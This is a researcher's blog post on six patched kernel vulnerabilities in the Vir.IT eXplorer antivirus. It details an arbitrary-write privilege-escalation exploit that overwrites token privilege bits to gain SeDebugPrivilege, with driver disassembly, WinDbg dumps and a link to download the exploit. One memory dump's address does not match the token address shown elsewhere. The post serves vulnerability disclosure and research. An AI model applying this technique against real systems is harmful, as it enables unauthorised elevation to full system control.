<h1>Exploiting Vir.IT eXplorer Anti-Virus Arbitrary Write Vulnerability</h1>
<p>Published 2017-11-02 (last modified 2022-04-12). Permalink: <a href="https://www.greyhathacker.net/?p=990">https://www.greyhathacker.net/?p=990</a></p>
<p>Last month I started hunting for kernel bugs again and it wasn’t too long before I found a nice collection of bugs in an antivirus product called Vir.IT eXplorer. In total 6 kernel vulnerabilities were discovered. All of the vulnerabilities were due to the input buffer of the IOCTL handler not being validated. The table below lists the IOCTLs, the related CVE IDs and the vulnerability type.</p>
<table>
<tbody>
<tr>
<td><strong>IOCTL</strong></td>
<td><strong>CVE ID</strong></td>
<td><strong>Vulnerability Type</strong></td>
</tr>
<tr>
<td>0x82730078</td>
<td>CVE-2017-16233</td>
<td>Buffer Overflow</td>
</tr>
<tr>
<td>0x82730048</td>
<td>CVE-2017-16234</td>
<td>Denial of Service</td>
</tr>
<tr>
<td>0x82730098</td>
<td>CVE-2017-16235</td>
<td>Arbitrary Write</td>
</tr>
<tr>
<td>0x82730028</td>
<td>CVE-2017-16236</td>
<td>Denial of Service</td>
</tr>
<tr>
<td>0x8273007C</td>
<td>CVE-2017-16237</td>
<td>Arbitrary Write</td>
</tr>
<tr>
<td>0x82730080</td>
<td>CVE-2017-16238</td>
<td>Arbitrary Write</td>
</tr>
</tbody>
</table>
<p>All of the vulnerabilities were fixed and an updated product released within a day.</p>
<table>
<tbody>
<tr>
<td><strong>Component</strong></td>
<td><strong>Vulnerable version</strong></td>
<td><strong>Fixed version</strong></td>
</tr>
<tr>
<td>Software</td>
<td>8.5.39</td>
<td>8.5.42</td>
</tr>
<tr>
<td>Viragtlt.sys</td>
<td>1.80.0.0</td>
<td>1.81.0.0</td>
</tr>
<tr>
<td>Viraglt64.sys</td>
<td>1.0.0.11</td>
<td>1.0.0.12</td>
</tr>
</tbody>
</table>
<p>I decided to exploit the IOCTL 0x8273007C by overwriting the _SEP_TOKEN_PRIVILEGES structure.</p>
<p><img loading="lazy" decoding="async" class="alignnone size-medium" src="/images/8273007c.png" width="574" height="566" /></p>
<p>Here I am overwriting certain offsets of the _SEP_TOKEN_PRIVILEGES structure with the byte 0x11: one byte in the “Present” field and one byte in the “Enabled” field. This gives us the “SeDebugPrivilege” privilege. Once the privilege has been obtained, all that remains is to inject shellcode into a privileged process. Two writes are needed because, as Kyriakos Economou (<a href="https://twitter.com/kyREcon" target="_blank" rel="noopener">@kyREcon</a>) pointed out, in Windows 10 (1703) the “Enabled” privileges are checked against the “Present” privileges. You can read Kyriakos’s paper <a href="http://www.anti-reversing.com/ntoskrnl-v10-0563_nt_sep_token_privileges-single-write-eop-protect/" target="_blank" rel="noopener">here</a>.</p>
<p>For this exploit you can overwrite with whatever values/offsets you like to get the desired privileges. I just happened to use the value 0x11 in this case, knowing it would give me the “SeDebugPrivilege” privilege (written at byte offset 2 of the 64-bit privilege mask, 0x11 sets bits 16 and 20, i.e. SeCreatePermanentPrivilege and SeDebugPrivilege, as the !token output below confirms), as I had previously written another exploit using it, which I’m still waiting to publish until that software’s fix has been released.</p>
<p>The vulnerable code has two XCHG instructions that overwrite the “Present” and “Enabled” fields of the _SEP_TOKEN_PRIVILEGES structure in one go, with no check on the destination address supplied in the input buffer.</p>
<pre>loc_FFFFF88000DE3E79:
  mov     rbp, [rdi]          ; rdi points to input buffer; rbp holds our SEP address - input[0]
  mov     rsi, cr8            ; CR8 holds the current IRQL on x64
  mov     ecx, 2
  cmp     sil, cl
  jnb     short loc_FFFFF88000DE3E95
  mov     rax, cr8            ; raise IRQL to 2 (DISPATCH_LEVEL) if it is lower
  mov     cr8, rcx
  mov     sil, al
loc_FFFFF88000DE3E95:
  call    sub_FFFFF88000DEC128
  mov     rcx, [rdi+8]        ; rcx holds "Present" bytes - input[1]
  <span style="color: #ff0000;">xchg    rcx, [rbp+0]        ; Overwriting "Present" bytes</span>
  mov     rdx, [rdi+10h]      ; rdx holds "Enabled" bytes - input[2]
  <span style="color: #ff0000;">xchg    rdx, [rbp+8]        ; Overwriting "Enabled" bytes</span></pre>
<p>Looking at our _SEP_TOKEN_PRIVILEGES structure in WinDbg:</p>
<pre>kd&gt; !process 0 0 cve-2017-16237.exe
<span style="color: #ff0000;">PROCESS fffffa8032939600</span>
    SessionId: 1  Cid: 05bc    Peb: 7fffffd6000  ParentCid: 0644
    DirBase: 32c17000  ObjectTable: fffff8a001d4a580  HandleCount:  13.
    Image: cve-2017-16237.exe

kd&gt; !process fffffa8032939600 1
PROCESS fffffa8032939600
    SessionId: 1  Cid: 05bc    Peb: 7fffffd6000  ParentCid: 0644
    DirBase: 32c17000  ObjectTable: fffff8a001d4a580  HandleCount:  13.
    Image: cve-2017-16237.exe
    VadRoot fffffa80323a91b0 Vads 27 Clone 0 Private 2014. Modified 0. Locked 0.
    DeviceMap fffff8a003a77760
    <span style="color: #ff0000;">Token                             fffff8a0031a8060</span>
    ElapsedTime                       00:00:00.686
    UserTime                          00:00:00.000
    KernelTime                        00:00:00.000
    QuotaPoolUsage[PagedPool]         0
    QuotaPoolUsage[NonPagedPool]      0
    Working Set Sizes (now,min,max)  (2362, 50, 345) (9448KB, 200KB, 1380KB)
    PeakWorkingSetSize                2362
    VirtualSize                       16 Mb
    PeakVirtualSize                   16 Mb
    PageFaultCount                    2359
    MemoryPriority                    BACKGROUND
    BasePriority                      8
    CommitCharge                      2089

kd&gt; dt nt!_TOKEN fffff8a0031a8060
   +0x000 TokenSource      : _TOKEN_SOURCE
   +0x010 TokenId          : _LUID
   +0x018 AuthenticationId : _LUID
   +0x020 ParentTokenId    : _LUID
   +0x028 ExpirationTime   : _LARGE_INTEGER 0x7fffffff`ffffffff
   +0x030 TokenLock        : 0xfffffa80`31e23d40 _ERESOURCE
   +0x038 ModifiedId       : _LUID
   <span style="color: #ff0000;">+0x040 Privileges       : _SEP_TOKEN_PRIVILEGES</span>
   +0x058 AuditPolicy      : _SEP_AUDIT_POLICY
   +0x074 SessionId        : 1
   +0x078 UserAndGroupCount : 0xf
   +0x07c RestrictedSidCount : 0
   +0x080 VariableLength   : 0x2c0
   +0x084 DynamicCharged   : 0x400
   +0x088 DynamicAvailable : 0
   +0x08c DefaultOwnerIndex : 0
   +0x090 UserAndGroups    : 0xfffff8a0`031a8370 _SID_AND_ATTRIBUTES
   +0x098 RestrictedSids   : (null)
   +0x0a0 PrimaryGroup     : 0xfffff8a0`03202830 Void
   +0x0a8 DynamicPart      : 0xfffff8a0`03202830  -&gt; 0x501
   +0x0b0 DefaultDacl      : 0xfffff8a0`0320284c _ACL
   +0x0b8 TokenType        : 1 ( TokenPrimary )
   +0x0bc ImpersonationLevel : 0 ( SecurityAnonymous )
   +0x0c0 TokenFlags       : 0x2a00
   +0x0c4 TokenInUse       : 0x1 ''
   +0x0c8 IntegrityLevelIndex : 0xe
   +0x0cc MandatoryPolicy  : 3
   +0x0d0 LogonSession     : 0xfffff8a0`03b398a0 _SEP_LOGON_SESSION_REFERENCES
   +0x0d8 OriginatingLogonSession : _LUID
   +0x0e0 SidHash          : _SID_AND_ATTRIBUTES_HASH
   +0x1f0 RestrictedSidHash : _SID_AND_ATTRIBUTES_HASH
   +0x300 pSecurityAttributes : 0xfffff8a0`0328df10 _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION
   +0x308 SessionObject    : 0xfffffa80`320f83e0 Void
   +0x310 VariablePart     : 0xfffff8a0`031a8460</pre>
<p>Before overwriting the bytes, the structure looks like this:</p>
<pre>kd&gt; dt nt!_SEP_TOKEN_PRIVILEGES fffff8a0031a8060+40
   +0x000 Present          : 0x6`02880000
   +0x008 Enabled          : 0x800000
   +0x010 EnabledByDefault : 0x800000

kd&gt; db fffff8a0031a8060+40 l18
fffff8a0`031a80a0  00 00 88 02 06 00 00 00-00 00 80 00 00 00 00 00  ................
fffff8a0`031a80b0  00 00 80 00 00 00 00 00                          ........</pre>
<p>and afterwards:</p>
<pre>kd&gt; dt nt!_SEP_TOKEN_PRIVILEGES fffff8a0031a8060+40
   +0x000 Present          : 0x6`02110000
   +0x008 Enabled          : 0x110000
   +0x010 EnabledByDefault : 0x800000

kd&gt; db fffff8a0031a8060+40 l18
fffff8a0`02b08a70  00 00 <span style="color: #ff0000;">11</span> 02 06 00 00 00-00 00 <span style="color: #ff0000;">11</span> 00 00 00 00 00  ................
fffff8a0`02b08a80  00 00 80 00 00 00 00 00                          ........</pre>
<p>Checking the privileges:</p>
<pre>kd&gt; !token fffff8a0031a8060
_TOKEN fffff8a0031a8060
TS Session ID: 0x1
User: S-1-5-21-2231847605-3015871416-1385684711-1000
Groups: 
 00 S-1-5-21-2231847605-3015871416-1385684711-513
    Attributes - Mandatory Default Enabled 
 01 S-1-1-0
    Attributes - Mandatory Default Enabled 
 02 S-1-5-114
    Attributes - DenyOnly 
 03 S-1-5-32-544
    Attributes - DenyOnly 
 04 S-1-5-32-545
    Attributes - Mandatory Default Enabled 
 05 S-1-5-4
    Attributes - Mandatory Default Enabled 
 06 S-1-2-1
    Attributes - Mandatory Default Enabled 
 07 S-1-5-11
    Attributes - Mandatory Default Enabled 
 08 S-1-5-15
    Attributes - Mandatory Default Enabled 
 09 S-1-5-113
    Attributes - Mandatory Default Enabled 
 10 S-1-5-5-0-118426
    Attributes - Mandatory Default Enabled LogonId 
 11 S-1-2-0
    Attributes - Mandatory Default Enabled 
 12 S-1-5-64-10
    Attributes - Mandatory Default Enabled 
 13 S-1-16-8192
    Attributes - GroupIntegrity GroupIntegrityEnabled 
Primary Group: S-1-5-21-2231847605-3015871416-1385684711-513
Privs: 
 16 0x000000010 SeCreatePermanentPrivilege        Attributes - Enabled 
<span style="color: #ff0000;"> 20 0x000000014 SeDebugPrivilege                  Attributes - Enabled</span> 
 25 0x000000019 SeUndockPrivilege                 Attributes - 
 33 0x000000021 SeIncreaseWorkingSetPrivilege     Attributes - 
 34 0x000000022 SeTimeZonePrivilege               Attributes - 
Authentication ID:         (0,1d038)
Impersonation Level:       Anonymous
TokenType:                 Primary
Source: User32             TokenFlags: 0x2a00 ( Token in use )
Token ID: e8a62            ParentToken ID: 1d03b
Modified ID:               (0, e8571)
RestrictedSidCount: 0      RestrictedSids: 0000000000000000
OriginatingLogonSession: 3e7</pre>
<p>The exploit is written to work only from a medium integrity process, as I’m using the NtQuerySystemInformation(SystemHandleInformation) API to leak the address of the process token. It has been tested on 64-bit Windows 7 and Windows 10 (1709).</p>
<p><img loading="lazy" decoding="async" class="alignnone size-medium" src="/images/cve-2017-16237.png" width="674" height="611" /></p>
<p>The exploit can be downloaded from here [<a href="https://www.greyhathacker.net/docs/cve-2017-16237.zip" target="_blank" rel="noopener">zip</a>] (pass “ghh”) or from Exploit-DB when it gets published.</p>
<p><a href="https://twitter.com/parvezghh" target="_blank" rel="noopener">@ParvezGHH</a></p>